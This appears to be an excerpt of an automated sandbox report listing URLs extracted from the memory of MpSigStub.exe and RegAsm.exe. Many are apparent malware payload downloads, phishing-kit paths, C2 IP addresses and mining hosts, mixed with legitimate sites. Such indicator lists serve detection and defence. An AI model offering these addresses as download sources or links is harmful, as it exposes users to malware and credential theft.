Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://www.zixzelz1.narod.ru/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://www.znoo.net
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://www.zv05.com/sys2a
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.zxboy.com#http://
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://www3.stargoldmovies.com//load.php?spl=javad
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/baidu?
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www5.baidu.com/s?
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
Source: MpSigStub.exe, 00000023.00000003.18320569449.0000015B1B556000.00000004.00000001.sdmp String found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://x0.nl/install/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://x01c4fr.sed.doormedic.com
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://xhuehs.cantvenlinea.ru:1942
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://xisake.biz/control/
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://xml.fiestappc.com/feed.php?aid=
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://xmr-services.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://xmr.enjoytopic.tk
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://xuanbbs.net/bbs
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://xupaeudenovo.net/net.jsp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://xvive.com/twiki/b.txt
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://xwjhdjylqeypyltby.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://xx.522love.cn/tool/down
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://xxx.llxxcx.cn/pv.htmwidth=0name=
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://xxx.llxxcx.cn/wm.htmwidth=0name=
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://xxxxxxxxx9:8618/client/android/a.apk
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8ar
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8he
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8qq
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e8u9
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/e9yp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://xy2.eu/ecpx
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://xzqpl.chujz.com/l14.gif
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://xzsite.chujz.com/soft/ad.html
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://yamaofficial.com/rxuczm/3415201.png
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://yantarbereg.ru/goodl.js
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://yasovetn1k.ru/files/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://yawaop.com/anna.doc
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://yc.book.sohu.com/series_list.php?select=1&text=%s
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://ydlevents.com.my/www/ucountredeem/php/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://yeabests.cc
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://ygsondheks.info/c/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://yobe.me?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://yoga-berry.com?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://yotaset.ddns.net/yota.dot
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://your_updater.com/privacy-policyso.html
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://youssef-tawil.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://z7v8.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://zistiran.com/invoice-for-you/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000023.00000003.18283887577.0000015B1A84E000.00000004.00000001.sdmp String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://107.151.152.220:5658
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://1361227624.rsc.cdn77.org/v2/p2r.php?
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://1591523753.rsc.cdn77.org/p2r.php?
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://193.29.15.147
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://42801.weebly.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.18554731304.000000001D0B1000.00000004.00000001.sdmp String found in binary or memory: https://L28jr6eoUX1h4b48w.com
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp String found in binary or memory: https://L28jr6eoUX1h4b48w.com(6%
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp String found in binary or memory: https://L28jr6eoUX1h4b48w.comt-
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://a.pomfe.co/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://ab.v-mail.online/?e=jhusic
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://abbeyfiechestere.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: https://accounts-c153b9bqxw.com
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: https://adverts-pistonheads.com/poste/action.php
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://alexdepase.coach/wp-admin/Ic4ZVsh/
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: https://am.localstormwatch00.localstormw
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://amigosforever.net/d/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://antarbryansk.ru/asdf/?_truthcolor=?dramafrine
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://asgvprotecao.com.br/wa_php/clZ&LpN-omp/klbd5vxr6mf38o/YxSlZ&LpN-slZ&LpN-9udRlZ&LpN-8U.plZ&Lp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://asianbusss.ru/qazx/?activity=4789652
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://atencionpreferente.com/crm/custom/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
